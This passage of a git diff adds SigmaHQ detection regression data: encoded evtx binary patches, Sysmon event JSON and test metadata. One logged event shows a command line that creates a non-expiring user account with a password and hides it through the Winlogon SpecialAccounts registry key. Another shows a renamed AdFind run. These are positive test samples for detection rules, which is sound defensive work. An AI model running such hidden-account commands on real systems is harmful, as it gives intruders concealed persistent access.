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 V2q+LxAfP}%fq()51qM6?{tc%{2RQ%$ literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json new file mode 100644 index 000000000..0ddd2e498 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-31T05:06:45.367278Z" + } + }, + "EventRecordID": 657153, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3080, + "ThreadID": 4948 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-31 05:06:45.364", + "ProcessGuid": "14207D89-43E5-6904-4506-000000004002", + "ProcessId": 5244, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", + "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-34DD-6904-8287-190000000000", + "LogonId": "0x198782", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "14207D89-43E5-6904-4106-000000004002", + "ParentProcessId": 6656, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"cmd.exe\" /c NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never & REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml new file mode 100644 index 000000000..8b2a1c592 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml @@ -0,0 +1,13 @@ +id: de8dc72e-19eb-465a-83ac-59545ae56426 +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: 9ec9fb1b-e059-4489-9642-f270c207923d + title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx new file mode 100644 index 0000000000000000000000000000000000000000..0d04a62fd338fbe90b31752155647de76a37752a GIT binary patch literal 69632 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 I<;kr72eCS&nE(I) literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json new file mode 100644 index 000000000..4212ed2dd --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:26:58.441823Z" + } + }, + "EventRecordID": 256793, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:26:58.421", + "ProcessGuid": "5AB40FD1-3E12-68F9-1A31-000000003B02", + "ProcessId": 6856, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-AdFind.exe", + "FileVersion": "1.52.0.5064", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "renamed-AdFind.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=12011C44955FD6631113F68A99447515,SHA256=C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3,IMPHASH=12CE1C0F3F5837ECC18A3782408FA975", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml new file mode 100644 index 000000000..535f0a655 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml @@ -0,0 +1,13 @@ +id: 09eb713e-f4b1-42ce-9c8e-d446ba0d548a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: df55196f-f105-44d3-a675-e9dfb6cc2f2b + title: Renamed AdFind Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a445e60169d582f962fdfb3b4619a630d81e49ae GIT binary patch literal 69632 zcmeI533wDm`o?P}CkdG(2CVtkPo80Vx~uDZ zyMFanRoBcEeM$<_i%UG>*oRZ@sKTpL1PKx2I5x@u{66K#Z$1C#OzaHo60l3aE&;m) z>=Lj`z%Bv11nd&9OTaDxy9DeKuuI^iCD5m&AhpOlQt;iq-fI=*gh_!Zu|k}C_`%Ch zn(;{zP@FxNZYVlBS<6s_2p8g~5FvI4AALlK_SkMy@Xo;Bg_(i6F zTJEQPk7HlKF?z1X`@?dQjl*+v5+{JP`3u)7l=j+GhLupR+@nzVlrqoV%2~X-A zb+~R>k%^a^Lsj7Jbcsj;ZtxWlqw}w zjK?NjAU$4h93uLN(ZVCV!iV?w;u(6YJh(DCM2r=sq67yka3I9dSrj3ePmB`XL`VEp zh&=4^AWbf|{Yd@5)30QpV$b8TNM+V{pui*DFLP{9TEyP9hoqdTPU0)O+W2 z)YNbWVz*>QYlviWuC8tXSR%7cf>4Ua169@n(uD^`2?}<_iq^rR36i49DNoc;bX2PPaM4VJ3v^j{1Y?Vy;UYpw zhtrk)o$xM3M2if(E^pLY$%T7CQN``y@Ww*yL`F$Js@4sG3Fr|*p|ha5ej^npZoob- z=$7HSD{%E{LsN?PUNJ0r)D7*|?nqrdAoSS_QqD zbL26VnHyARlv700Iql>*&Fk_%-T?W+85JbLDSd01p6E;UA*fQ+;S@r@GYZv6S4%od zo365c1M7?mIl(z;NKf4w)$CEVyqr;?Cnz7a)5%AfQiI}*3OhksYMsb*v9jjn!0|vRa0te%tlHsVYTLP(_dE}P1N$}EF&r1sOqq2I85(+ z_4>|HuTRIFb>|-KqNb;)SFcVrQ_m+BR4ZE6l}toEz1%4{qyB_5f(11*PBi85vRS7l ze>Aq!@obMLHS_e^1kW~j4#Benp40_UccFF>NP||A_R;$;INn31i&KW1SBTDN(-Sb@ zr1w_{x3aez{_To^EFF!q(+t;k^|3BAL4~u%dnS*O*u-9qICI6x?Jp0`K#m5e5j(n+Nac?cx=&_fz-w; zPZ}^MV!)h?_X*H`ne454!>iQ3tDImLH#w8nqnfQ3=)cfyZC-$xFou7AfcrX#|jo z(xO^&BED2VeA9m^+SxybDv01$x?{=!jY5=X7V1D}aTRJ)vgnPi6wvE}?PR5Ql;jrZfS$4@D^c=av-T<|&WQ8#PLFbx_@qkHdIF_wBp!I#KTXtnY(I`o{5ndy`#% zy=7md&>R<2#o}=>RXJ+l)J9Jo7q^h(;$+zpSc?gQx&LY><`pWE8&n?vjK_QfW3@FVf@-adZhoT{{Zm0&X%Ee|=~BO1Tf 